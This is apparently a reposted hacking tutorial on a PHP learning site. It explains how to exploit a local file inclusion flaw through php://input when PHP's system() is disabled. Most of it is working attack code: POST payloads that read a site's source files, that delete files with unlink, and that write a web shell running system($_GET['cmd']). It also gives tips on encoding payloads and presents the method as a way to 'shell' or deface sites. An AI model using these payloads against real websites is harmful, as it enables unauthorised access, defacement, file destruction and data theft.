网站地图    收藏   

主页 > 后端 > 网站安全 >

How to bypass the restriction of the system function - 网站安

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] Requirements :Site vulnerable to LFIShellPhp wrappers musn#39;t be disabledBrain (that can be usefull)Introduction :You found an LFI vulnerability on a website and you want......

Requirements : 
Site vulnerable to LFI
Shell
Php wrappers musn't be disabled
Brain (that can be usefull)
 
Introduction :
 
You found an LFI vulnerability on a website and you want to shelled it but the configuration of server doesn't allow the utilization of system, shell_exec etc.
 
Error you would must see :
 
Code:
PHP Warning:  system() has been disabled for security reasons in /home/dir/public_html/index.php on line 374
 
So you can use /proc/self/environ method but if it doesn't work you cannot upload your shell or your deface page by system function.
Exploitation :
 
The purpose of this method will be to inject php code into the page to receive expected data from the server.
Another way to read the source :
Example of URL :
 
Code:
http:// www.2cto.com /index.php?page=php://input
 
The php://input is very important.
 
Open your hackbar and click in "Load URL" then click on "Enable Post Data" and write this in "Post Data".
 
PHP Code:
<?
echo "<textarea>".file_get_contents('NAMEFILE.EXT')."<textarea>";
?>
 
The server will return the source code including php in textarea, I use a textarea because on some website it is very unreadable.
Another way to delete a page:
Same step that above but in "Post Data" you will write :
 
PHP Code:
<?
unlink('NAMEFILE.EXT');
?>
Another way to upload your shell:
If you don't have knowledge in php it will be a little bit difficult, don't be absentminded .
 
This time in "Post Data" you will write :
 
PHP Code:
$f = fopen('shell.php','a+');
fwrite($f,'**');//I used fwrite because fputs was disabled
fclose($f);
 
** = Some explanations is needed, so instead of ** put your code but be careful i'm sure your code contain a lot of quote and you will must escape it.
So I recommended you to use an encryption that is decrypt when the php code is excuted because the encryption won't contain quote.
 
An example :
 
PHP Code:
<?
$f = fopen('shell.php','a+');
fwrite($f,'<?php system($_GET[\'cmd\']); ?>');//I used fwrite because fputs was disabled
fclose($f);
?>
 
The real code that is create on the page is :
 
PHP Code:
<?php
system($_GET['cmd']);
?>
 
Go
on page and to use the script, do like that :




So I think it's all, I hope it will be helpful and you liked it. If you don't understand something or just talk about this method PM me


摘自 JUST FUCK IT!

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论